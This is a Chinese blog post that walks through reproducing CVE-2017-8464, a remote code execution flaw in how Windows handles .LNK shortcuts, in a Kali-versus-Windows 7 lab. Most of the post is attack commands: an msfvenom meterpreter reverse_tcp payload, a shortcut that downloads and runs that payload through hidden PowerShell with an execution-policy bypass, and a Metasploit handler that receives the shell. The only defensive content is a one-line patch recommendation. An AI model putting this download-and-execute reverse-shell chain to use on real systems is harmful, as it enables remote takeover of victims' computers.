CVE-2017-8464(远程代码执行漏洞)
程序员文章站
2022-07-15 13:45:10
...
CVE-2017-8464(远程代码执行漏洞)
漏洞概述:
当Windows系统在解析快捷方式时,存在远程执行任意代码的高危漏洞,黑客可以通过U盘、网络共享等途径触发漏洞,完全控制用户系统,安全风险高危。
攻击者可以向用户呈现包含恶意的.LNK文件和相关联的恶意二进制文件的可移动驱动器或远程共享。 当用户在Windows资源管理器或解析.LNK文件的任何其他应用程序中打开此驱动器(或远程共享)时,恶意二进制程序将在目标系统上执行攻击者选择的代码,成功利用此漏洞的攻击者可以获得与本地用户相同的用户权限。
注释:.LNK是windows系统内应用程序快捷方式文件的文件类型后缀名。
影响范围:
Windows 7
Windows 8.1
Windows RT 8.1
Windows 10
Windows Server 2008
Windows Server 2008 R2
Windows Server 2012
Windows Server 2012 R2
Windows Server 2016
环境搭建:
攻击机:Kali、IP:192.168.110.132
目标机:Windows7、IP:192.168.110.135
复现:
1.生成攻击文件:search.ps1
msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.110.132 -f psh-reflection>/opt/search.ps1
2.将/opt/目录下的search.ps1文件移动到/var/www/html下,并打开Apache服务
cd /opt/
mv search.ps1 /var/www/html
service apache2 start
3.在目标机可以直接访问这个文件:search.ps1
4.在目标机上创建一个快捷方式,写入我们构造好的代码,命名为powershell.exe
powershell -windowstyle hidden -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://192.168.110.132/search.ps1');test.ps1"
5.这时,回到攻击机,打开Metasploit,监听,添加参数:payload、Kali IP、监听端口
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set lhost 192.168.110.132
set lport 5555
exploit/run
6.开始监听,这时,我们在目标机上打开创建的快捷方式:powershell.exe
7.回到攻击机,发现我们已经成功得到shell了
修复建议:
安全更新、建议客户升级
推荐阅读
-
OpenCart json_decode函数中存在远程PHP代码执行漏洞
-
ThinkPHP框架任意代码执行漏洞的利用及其修复方法
-
Adobe Flash CS3 Professional FLA 代码执行漏洞
-
F5 BIG-IP远程代码执行漏洞(CVE-2020-5902)POC
-
PHP-CGI远程代码执行漏洞分析与防范
-
PHP-CGI远程代码执行漏洞分析与防范
-
PHPbb2.0.15远程命令执行漏洞利用程序_PHP教程
-
PHPbb2.0.15远程命令执行漏洞利用程序_PHP教程
-
iis 这个漏洞我要怎么解决, 比如我一个图片,后面加上一段php代码可以执行
-
PHPbb2.0.15远程命令执行漏洞利用程序